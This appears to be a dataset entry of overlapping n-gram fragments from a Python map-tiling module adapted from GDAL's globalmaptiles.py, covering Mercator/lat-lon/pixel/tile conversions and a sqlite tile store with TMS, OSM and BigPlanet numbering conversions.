ngram
listlengths
0
67.8k
[ "TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi *", "GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles", "= math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi /", "= 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name", "maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def", "always divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062", "like to know where it was used. Class is available under the open-source", "the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS", "int( math.ceil( px / float(self.tileSize) ) - 1 ) ty = int( math.ceil(", "-s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped", "\"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon", "px, py): \"Returns a tile covering region in given pixel coordinates\" tx =", "class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self, type):", "180.0 my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) /", "- self.originShift my = py * res - self.originShift return mx, my def", "cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple", "for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\"", "sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur", "notation (origin [0,0] in bottom-left). 
What coordinate conversions do we need for TMS", "zoom level (measured at Equator)\" # return (2 * math.pi * 6378137) /", "given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px,", "klokan at klokan dot cz. I would like to know where it was", "self.Resolution( zoom ) mx = px * res - self.originShift my = py", "is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant", "z) in res: xx= x zz= 17 - z yy= 2**zz - y", "yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a", "a single tile from string \"\"\" if (x, y, z) in self.written: return", "at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of", "is the difference between TMS and Google Maps/QuadTree tile name convention? The tile", "on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case", "res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913", "bottom-left corner, id is XYZ. Google placed the origin [0,0] to the top-left", "projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT", "coordinates in given zoom level\" res = self.Resolution( zoom ) px = (mx", "and tile coordinates are in TMS notation (origin [0,0] in bottom-left). 
What coordinate", "TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read())))", "sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering", "if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0 # We", "gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with", "a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by", "tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2", "EPSG:900913 and convert coordinates with PROJ.4? 
You can use standard GIS tools like", "whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,", "from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are", "filename, overwrite=False): \"\"\" Create a new storage file, overwrite or not if already", "# ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined", "of the given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx,", "CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int,", "(2**zoom - 1) - ty for i in range(zoom, 0, -1): digit =", "TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical", "lat/lon we are mentioning should use WGS84 Geodetic Datum. 
Well, the web clients", "origin is moved from bottom-left to top-left corner of the extent return tx,", "x, y, z from tiles\") res = cur.fetchall() for (x, y, z) in", "ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate origin", "origin of pixel coordinates to top-left corner\" # # mapSize = self.tileSize <<", "Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection,", "QuadTree\" quadKey = \"\" ty = (2**zoom - 1) - ty for i", "(z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self,", "zoom ) px = (mx + self.originShift) / res py = (my +", "return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom ):", "pixels self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def", "coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated", "y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z", "ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon,", "moved from bottom-left to top-left corner of the extent return tx, (2**zoom -", "the official EPSG database. 
Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0", "#cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z, x,", "return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ):", "Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0],", "import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z", "180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom):", "due # to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one", "= cur.fetchone() if res: image = str(res[0]) return image else : print (\"None", "math.pi / 360.0 )) / (math.pi / 180.0) my = my * self.originShift", "Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical", "supports -t_srs 'epsg:900913'. For other GIS programs check the exact definition of the", "Create a new sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet')", "OSGEO. 
In case you use this class in your product, translate it to", "given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom)", "if self.maxzoom is None or z > self.maxzoom: self.maxzoom = z self.commitData() def", "(tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self,", "res = cur.fetchall() for (x, y, z) in res: xx= x zz= z", "createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file from a", "= z self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500 or", "need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile", "int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF", "UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256):", "PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the", "minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat,", "Create a new storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True", "mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py)", "all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the web", "\"Move the origin of pixel coordinates to top-left corner\" # # mapSize =", "WebMapService Web Clients TileMapService What is the coordinate extent of Earth in EPSG:900913?", "are clipped off. 
What are zoom level constants (pixels/meter) for pyramid with EPSG:900913?", "< self.minzoom: self.minzoom = z if self.maxzoom is None or z > self.maxzoom:", "(2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom)", "createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from", "scale distortion in the Y direction, which is not visually noticable. How do", "Y direction, which is not visually noticable. How do I create a raster", "return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the", "of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the", "EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.", "<-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon", "from the circumference of the Earth in meters, which is 40 thousand kilometers,", "pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) - 1 )", "z, f) #cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)', #", "QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the", "generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator),", "mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator", "self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty,", "1 ) ty = int( math.ceil( py / float(self.tileSize) ) - 1 )", "= self.tileSize << zoom # return px, mapSize - py def MetersToTile(self, mx,", "MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\" px, py =", "KML, public WebMapService Web Clients TileMapService What is the coordinate extent of 
Earth", "ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type,", "\\ <-> | | <-> /----/ <-> Google \\ / | | /--------/", "overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps", "py def PixelsToTile(self, px, py): \"Returns a tile covering region in given pixel", "visually noticable. How do I create a raster in EPSG:900913 and convert coordinates", "constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85", "return px, mapSize - py def PixelsToTile(self, px, py): \"Returns a tile covering", "TMS tile coordinates to Google Tile coordinates\" # coordinate origin is moved from", "class in your product, translate it to another language or find it usefull", "else: return 0 # We don't want to scale up def GoogleTile(self, tx,", "PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS", "EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the", "return 0 # We don't want to scale up def GoogleTile(self, tx, ty,", "like Google Maps are projecting those coordinates by Spherical Mercator, so in fact", "Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM')", "self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom):", "web mapping applications. 
Pixel and tile coordinates are in TMS notation (origin [0,0]", "2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a", "scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "Clients TileMapService What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244,", "= sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor()", "From MSDN documentation: To simplify the calculations, we use the spherical form of", "fact lat/lon coordinates on sphere are treated as if the were on the", "math.ceil( py / float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self,", "/ (math.pi / 180.0) my = my * self.originShift / 180.0 return mx,", "to Google Tile coordinates\" # coordinate origin is moved from bottom-left to top-left", "(x, y, z)) res = cur.fetchone() if res: image = str(res[0]) return image", "the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on", "EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx / self.originShift) * 180.0", "tile covering region in given pixel coordinates\" tx = int( math.ceil( px /", "in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0", "to top-left corner\" # # mapSize = self.tileSize << zoom # return px,", "Ordnance Survey OpenSpace API, ... 
and you can overlay them on top of", "numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "causes approximately 0.33 percent scale distortion in the Y direction, which is not", "from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global", "QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey", "for map display, and not for displaying numeric coordinates, we don't need the", "I would like to know where it was used. Class is available under", "2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no warranty", "Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you", "tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx,", "<-> /----/ <-> Google \\ / | | /--------/ QuadTree ----- --------- /------------/", "return i-1 else: return 0 # We don't want to scale up def", "in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz", "reference is XYZ. 
Microsoft is referencing tiles by a QuadTree name, defined on", "map display, and not for displaying numeric coordinates, we don't need the extra", "pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i):", "x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z,", "or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values", "another language or find it usefull for your project please let me know.", "up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile", "pyr res = self.Resolution( zoom ) mx = px * res - self.originShift", "self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS", "2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile", "self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite or", "y, 0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom =", "in Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my =", "from bottom-left to top-left corner of the extent return tx, (2**zoom - 1)", "+units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\",", "* math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0) return", "IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\",", "= \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS)", "\"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx", "20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters, which", "= self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ 
= self.TileLatLonBounds(tx, ty-1, zoom) return", "y=? and z=?\", (x, y, z)) res = cur.fetchone() if res: image =", "use this class in your product, translate it to another language or find", "pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize", "self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit()", "lon ): \"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator", "or z < self.minzoom: self.minzoom = z if self.maxzoom is None or z", "one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\")", ")) / (math.pi / 180.0) my = my * self.originShift / 180.0 return", "* (2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi /", "From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL,", "format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]],", "echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude)", "in res: xx= x zz= 17 - z yy= 2**zz - y -1", "= self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty,", "if (x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y,", "def create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite or not", "storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if", "at klokan dot cz. 
I would like to know where it was used.", "maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given", "= self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom)", "a new sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname,", "is None or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force", "sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE", "zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat,", "numeric coordinates, we don't need the extra precision of an ellipsoidal projection. The", "self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int, y", "f) : \"\"\" write a single tile from a file \"\"\" self.writeImage(x, y,", "Created by <NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for", "in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy", "image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info", "into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit()", ") return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin", "= [] self.db.commit() def readImage(self, x, y, z) : \"\"\" read a single", "in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon", "Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. 
Such tiles", "\"\"\" Create a new sqlite with TMS numbering scheme from a BigPlanet one\"\"\"", "lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom level", "directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'):", "1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the", "cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other GIS", "y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet", "origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles", "then 85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid", "are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region is on", "XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS", "GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" #", "x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom", "OpenSpace API, ... and you can overlay them on top of base maps", "None or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force =", "to pyramid pixel coordinates in given zoom level\" res = self.Resolution( zoom )", "like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. 
For", "p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured at", "commitData(self, force = False): if len(self.pending_images) > 500 or force: cur = self.db.cursor()", "bounds of the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize,", "0.33 percent scale distortion in the Y direction, which is not visually noticable.", "px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self,", "6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 *", "(based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More", "1 if (ty & mask) != 0: digit += 2 quadKey += str(digit)", "zoom ) return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty,", "- math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts", "def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db", "the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes, all", "def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom level of", "the given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty,", "lon = (mx / self.originShift) * 180.0 lat = (my / self.originShift) *", "convert coordinates with PROJ.4? 
You can use standard GIS tools like gdalwarp, cs2cs", "(my + self.originShift) / res mapSize = self.tileSize << zoom return px, mapSize", "p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured", "os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute(", "How do I create a raster in EPSG:900913 and convert coordinates with PROJ.4?", "-1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "form. Since the projection is used only for map display, and not for", "= [] def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if", "applications. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).", "156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 /", "forced due # to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale,", "/ \\ <-> | | <-> /----/ <-> Google \\ / | |", "Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 /", "numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? 
Yes, all lat/lon we", "= self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom", "with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur =", "and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created", "implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google", "coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do", "tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel", "Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference", "= px * res - self.originShift my = py * res - self.originShift", "http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code 2008,", "+a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT", "============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as", ": \"\"\" write a single tile from string \"\"\" if (x, y, z)", "cur.execute(\"select image from tiles where x=? and y=? 
and z=?\", (x, y, z))", "zoom # return px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns", "and z=?\", (x, y, z)) res = cur.fetchone() if res: image = str(res[0])", "yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create", "What are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region is", "yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create", "extent, projection, pixel size), there is just different identification of the same raster", "math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel", "TMS are counted from [0,0] in the bottom-left corner, id is XYZ. Google", "p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat,", "(p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution", "into tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z, x, y,", "TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom)", "mapSize = self.tileSize << zoom return px, mapSize - py def PixelsToTile(self, px,", "itself is the same (equal extent, projection, pixel size), there is just different", "= self.tileSize << zoom py = mapSize - pyr res = self.Resolution( zoom", "would like to know where it was used. Class is available under the", "Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\",", "(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\", "is not visually noticable. 
